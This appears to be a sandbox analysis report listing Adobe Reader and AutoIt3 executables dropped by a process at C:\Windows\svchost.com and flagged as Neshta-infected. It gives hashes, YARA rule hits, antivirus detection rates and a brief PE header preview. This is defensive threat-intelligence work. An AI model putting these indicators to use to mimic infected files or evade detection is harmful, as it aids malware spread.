                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.186107093668235
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCFhUpMPub5+G92qoooZVq/LF:sr85CTqSwgHVqDF
                                                                                                                        MD5:67059EAECEA081CE3E6426BCE980BFF0
                                                                                                                        SHA1:C1EDD7FD96E1C367A0403DD7A8DDA32AA3E13601
                                                                                                                        SHA-256:BC0FBF0B4739B4ED148D96B64308CD8815EAD686DE4400BBBA49E5B90BD7D21D
                                                                                                                        SHA-512:5E3BF07788443B558FBDBA88B41AAAA548D20697FBECF8B31F2CF1D4AC965A858100160ADAC30B7662EE2CBBFF17B3CEFA7A100623DB13C66C8735C5D70DE84E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.667436230875162
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCi3rlNE0YMqYCka4KltvntyHi:sr85Ci7LE0YEKlhtl
                                                                                                                        MD5:E13741E87379B8A0130CCB0F24B56D1E
                                                                                                                        SHA1:C1DF66670A0370F44E9F7BE15FCB60C580992D1F
                                                                                                                        SHA-256:CEDC7E901AA1E9FF96BA749A3239542AD29F62B1C08EA392B721CD28D0D298C8
                                                                                                                        SHA-512:F299C2732A09B5C7870CB9AAF5CAFDFD3DC41A0B81C6102B53962A1E3EA4A2BBC12C20FB788849612B6FEEA2B9571A2BA28A748FAE32BA58281A3C3203177110
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.461209967778202
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCl8H777b4o4yre0zlbTzqYOeg9lZdKMOZo2:sr85Cl8Hn7b4o4kbT93Kxj2
                                                                                                                        MD5:72EC370FCAB5AC9E14C7DE1B93C0B954
                                                                                                                        SHA1:B2216AE2B03F902878D852F9D52FFA704C76F61F
                                                                                                                        SHA-256:DB205349D14EA35D6081598FBDE492AB12BEF4A39555EB9B4F4020C5B492E039
                                                                                                                        SHA-512:6046A04E192C329D56FBC11118269DEEA06053D6C0C41FF5E6225938476B54969A03345D3B46F84B54D7B5262230584218466651E7B4ADDAA0E642AF3CF4F6F2
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.302303877870808
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCeJ8cSLgpA3hKwYPRvGdIab:sr85CncSLgpG88b
                                                                                                                        MD5:B41F70A22F31E1DA8FF057AD47499F3E
                                                                                                                        SHA1:15918D00F2C8DE480C4D3749D5317468C1B14DA0
                                                                                                                        SHA-256:8860EEA648A0CD39281639D27B1B9C981568ACEE9C3DBABDC5D862534F70946E
                                                                                                                        SHA-512:5F0C77A4842BA7FC53CECA4F641FA906EA0D26652876406B52158DC6BC3D36ADCC3A63E6FDA5B226073320ED301A21A6AFC87B930ED4D5B91058172727AB47A4
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.261294291615621
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmwGqE9qLa7QoIG5fIIXBB8C:sr85CaqcVz5fzsC
                                                                                                                        MD5:F25F4BF1D71532CE97C90BEEC7A56FBC
                                                                                                                        SHA1:337C45D81469B760EB7ADA0316AFC262FE4C3721
                                                                                                                        SHA-256:B24831A423AFFF5E65032A7673D7BA4E35192C43C365FCDE75D678CAF4605F33
                                                                                                                        SHA-512:5AEDA5CCD0F38392FEF3F14AD49EAC63D03ECBFDDC89D326DFE0ED03A225A1E7496B02D5F983168D1D7C96448F90718B6975A8D58EAAA6DF9626C27D4AF96DAC
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 97%
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.423139673646388
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCULKBHLLkRkjuXi65D5mFv1:sr85CU0LFjAiGI
                                                                                                                        MD5:C4CA362C5EF952BAF96EF61B59D8355D
                                                                                                                        SHA1:5DEB0DAE7262FF31BD9B2C2205D55D2E5D012CEF
                                                                                                                        SHA-256:A679F4131244485FD10E274A510C2B76DF545838B8562E579C9805269834355E
                                                                                                                        SHA-512:49261B804AB74A90DCE657FD7C4FE87F42505F673847C143C42A4CF89E2BF3226C329630ECCBF19FB584071FC4E7DAFFA7725F66A7E7936DC8CDF4A3E73425E3
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.355719905315724
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCdjrXDyO4zkm8dbHVLokF8iJTwRH0n:sr85CVrMzkm8PL3Eo
                                                                                                                        MD5:A42467B5C21814776277B4CE3456D716
                                                                                                                        SHA1:B01DD2412ADA123EF3D6317F839826D37C6A27D4
                                                                                                                        SHA-256:B1A5063A32CB8AFD591C57AAB1A679137EE29A886AF77849A13C26537A100AD9
                                                                                                                        SHA-512:62D2AECABE4892E0E25A9787A28898EC989A4AA54A66CDB7DE65EB48A8634E0274EB6515722EA1FA580C848E1AD683C75CE26F6AB7D7F7E48A5DD064DD1B3A24
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: Metadefender, Detection: 91%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.228109838185618
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC3uireklhKsikOkCWfNU:sr85C+ilU9xL
                                                                                                                        MD5:B9A06C8C07B4BC86001ABCA5835AEED2
                                                                                                                        SHA1:5EA2F32AD6F1642498CDE9F8CA74D8A70DE376E0
                                                                                                                        SHA-256:1531CA6AD23335F3F93231D153CB9DDEE40580A5A82D502AD6F7B54C8328D8B4
                                                                                                                        SHA-512:79C9F72832E53AED9E50C680F0146E6F971D77299E192DD61500E8B91117E19373C7EC92B84A31B2934FD65CD6090E9613BC6F62A2337A1313E7E52A1041B04E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.26326337462311
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCFbIJyoI91593nKMd/VHT:sr85CFboI9133K+HT
                                                                                                                        MD5:7C2E8C0527C5CFF276FB2FFA314D455A
                                                                                                                        SHA1:6B6FD014B9C295838E0F1F2D563C185A0004C028
                                                                                                                        SHA-256:41AEBB2A2B6175595684D20DF5F7B8AB8FEB2B5662530F6593287F9F72777296
                                                                                                                        SHA-512:2138731F6006CB6DF13821E05DC16EDEBF7F70777906AB03271707A1237DBFD8859ED43795F36A87901D63BDAA4CC738E46B9D2D0D6361546FD64A2AE56EB65F
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.079745714518026
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJCBF45im0N0I9U96lOQ7ABFPXdLtZqWn:JxqjQ+P04wsmJCJ4wNlu9HQIXsW/44
                                                                                                                        MD5:E6A82ED5EA7010F781B63E30C2377BEE
                                                                                                                        SHA1:1829EE1E5E5B34C9721F4EB51E3AD09F7A13DCE2
                                                                                                                        SHA-256:E02365CA739F356FE66B4F49C4D11EC156B0BB512211A177A813FC7D8B0C2DFD
                                                                                                                        SHA-512:2FD5BAF35A018DFF7FCA19A4C118E781FC9D03F9DDED1CEE8F2A5E9E6E41F1C99D984F24E5AB3E60AC2FFBD1B505F728410203D11234197D109BFDEC728ED40D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.352749197508949
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCZti/kCXBIvpnJXCFgyf:sr85CzgkC+Jt6gA
                                                                                                                        MD5:E784AF0ED9D53B2A29B2EBBDDE7E470B
                                                                                                                        SHA1:203533AB59D90155BE6EC83B9E7FD643869FBA9D
                                                                                                                        SHA-256:D8B35FBB5A6A4E3069FF8E60BB9F35670DEEB5B5933820CCC4FC9D9D4148EB78
                                                                                                                        SHA-512:A2C77DD2CB33815273C4730892FB45F2EB086853CE7544890FA970F666249FCA61AEDFB826109293066C2F615B95CAE48E9C28F96B0C59D6EA0423B337BDF291
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\AutoIt3\Au3Check.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.395396839059979
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCBBTfrVijfDZaoXFdP+aWYEsPnBEbfOjBvX5zjjSbE51E6AoAV9:sr85CnfrV5EAVMczsELz7Vz
                                                                                                                        MD5:B4E63C549366CFCDA2363E35C197D41C
                                                                                                                        SHA1:10E1078FF8D1FD5FF2080FCB659A012630FD07E8
                                                                                                                        SHA-256:68BE6B2F5E8181E4E36DB6F370E3110C43D702E6953735FE6843D230FA6E7A37
                                                                                                                        SHA-512:FB0B06847F459BA7D439D20608C3A098AA01B18FEBBF3D014536A3CF21353EC0524922056BF151B3A0F66E00E758C36CDC49B44A59C81F78B6249E93B535C893
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\AutoIt3\Au3Info.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.509452568334581
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCXl/TR5SDQQfzSIOOc1c:sr85CXFR5StHe+
                                                                                                                        MD5:A7D23C329BAABBA8B883C9B0EACCE4A5
                                                                                                                        SHA1:0E2B51FF3DA7806D0F5DCB403222D06637B08738
                                                                                                                        SHA-256:C2521122926A26FFDB7E9D56EE6E24682F1C76B573BEE8765E9E287CB1DCAE89
                                                                                                                        SHA-512:22116FE8362AA86EDBD268EF90A415B4E204416C39AB0312EFFA6E3C2C7C6AB85B000A642443DA071F61E3C370398D6C018E8F4582E9E854BAF2B3BCAB7E5D30
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.476428579556002
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCzbdrFQAj9UlJZ4PAZav4RLRLK:sr85CfQO9UKRGRLK
                                                                                                                        MD5:02879251FEBD3B13DFA84C0DBB3B9387
                                                                                                                        SHA1:D2226312A4460980B036C0CFD3B7BF95752145D9
                                                                                                                        SHA-256:28C72711975DEA1917D0B4C996D93E945F0487DFBDEB1A0B298E9A724F6E8937
                                                                                                                        SHA-512:864BF0149EBBF033306C7B0FBD168D696DFFFEE012B61991C5F0B4D35F82ECE7FE276EBEDE901BF30E22529D8EDEDF3EE3FF64F9D18A411624DB3188ABA45E4E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.520333669037674
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC32EQwB3BsLsWIGihj58u9otwqtOk:sr85C325wztj5xiv
                                                                                                                        MD5:32C22D658E9A54E56C54B1A2AFE1D817
                                                                                                                        SHA1:E1DA8AA26A509BC23A761EB25267DCE9F8A7EF92
                                                                                                                        SHA-256:C957D33A54BD308948E37F020C3FD23DCBE4762DF1143EFAE8109433342DE76C
                                                                                                                        SHA-512:C669F6999EA0ABC48D7AEFB32CD067F37B2894C8EDB1EC538063ED47B719A4597C5BFB770C821DE0D0384FE3B4AC212368B629284D8740E8855D7281A84590C9
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.481287941039048
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCrwiuLWf6G/YemcUCYY8AZqQwOp9yQeRoL3:sr85C0iuVAYemcUCN8AwhOpCoL
                                                                                                                        MD5:9C8E99E8AD1568B91CBC2A9FE09304A8
                                                                                                                        SHA1:DCD08E9FE8ACFEF7F194CF0E6759F5468FA028EC
                                                                                                                        SHA-256:A33D6E9432C5D3E83EE5CFEC260EB5C1396982EFC713DA6C5B31F67712272B41
                                                                                                                        SHA-512:68270258389E3EC950F6E1535D2EA7271611A57268B7897E4C76237122DF2B7E15884F4F110C11DFB711BDF42F80F682BC0D81D62E16C954EB7AE0EC43DEF349
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):7.2906774035349695
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCloZCsdndoviDI47IcIyh3e01pxDQOF:sr85C+Z1noWILcIys01vQOF
                                                                                                                        MD5:9B9601BFE0B0E353A4AB8B3FA54F7540
                                                                                                                        SHA1:BFCC868475761DB126FBCE6D36A8F3696C00FD3F
                                                                                                                        SHA-256:289C2D7F33C2ACB203D47A677ABEBC41A6D4D580BFBB3E80A4AD65D35DC65AB8
                                                                                                                        SHA-512:AC65B689940E9CA2A02CFE07F7D53C024B3E612621CCA202DAAE1E37709D66C713C7865C336DBCF8248FC42A55776B3327F9B2AA71C7FAED2F547AFFC4DC15EE
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.586052312714495
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJZe5EaY1O/TqX0YpwD3nwBoX0M12Pnhq:JxqjQ+P04wsmJC5QOgVKnwBvPlnJml5
                                                                                                                        MD5:934C8B78754C1FB79DF08EF114600899
                                                                                                                        SHA1:5A50BBC6139CF24D3785A1AC5BC1303087ACCFE6
                                                                                                                        SHA-256:12A68206D1263D798EB284C9A6EF654E4ACFAD20310AFAADB092B54A20358A3A
                                                                                                                        SHA-512:DFF08DAADC807CF170FDC13D4C2EC20D0567B6B4F91D1853F737A6B57ECBBD332EC98D237EF4705E77693361AC3027D0298F194BD10472A2AFF9338616B8C47D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.529393382316189
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC34bCTNhZYt+zphjirUcYkzzaOvo:sr85C3MCR74+/+YcW6o
                                                                                                                        MD5:B6BA74867ECBA5541827551FEEC46F7A
                                                                                                                        SHA1:62AFF9292E306BC442F46D8835CDBA2F777A0BF1
                                                                                                                        SHA-256:8D6A0F83B4FB84B8670BB9C103071B4D40CA433876242B476DB83BDB683FC446
                                                                                                                        SHA-512:850385B0D7ECF20BEC4406D0EFB1AB0A01D9B42E2011FAFC94A8DDB49932FC3B2EB0F6D486903B84D72518928567E96BAE638891F578B9C7CD32C0CEFAC052C4
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.7205787223638
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCA75/gWXq7+8aTaI/dBKvFBvqNm48fnRV2B:sr85CA0a8aTaI/dMrvkL8fnR6
                                                                                                                        MD5:29BAF7AE561A3CCC4EF6A6988D57324D
                                                                                                                        SHA1:B2D3512E166A5F9E10FAA4E461F6EB5A6B926531
                                                                                                                        SHA-256:0B607DF09D9876EC9A80D77B9F2E20267B611A75DA95962FD2DACFF286E00F9F
                                                                                                                        SHA-512:A8CF29B616CF505F8A52E0775F0B3859F29A56181F3E1D5B16B86B40FD4E5BA0ECC5DD81098AC1024A32A1CA4575CD9B7F9F6FB2D22C75F808FE32A124065015
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\AutoIt3\Uninstall.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.52588514314363
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCWCrRRPYqa5pic6jXFdL2KiMceCry:sr85CWCrbPA6jXFN2MceCry
                                                                                                                        MD5:DF57A3FC85CD6B6CFB31C52714E2D79E
                                                                                                                        SHA1:D4DA4DA44C58BB9B818CAF22C7A578FF1EDECF26
                                                                                                                        SHA-256:E660F04725795D12A67A796BA9A96889216C2CAE4A6ADA2459F7948428136BC1
                                                                                                                        SHA-512:14FBDFFF9E7689A2800A150FB3EB7F50E12A25DEBBC7CF18ADADCDAE925A72DE8E942F5A1AC0023D419C965E2DF9684217D13A95A1AD6C1FF2B61D1B2B814F70
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, Author: Florian Roth
                                                                                                                        Antivirus:
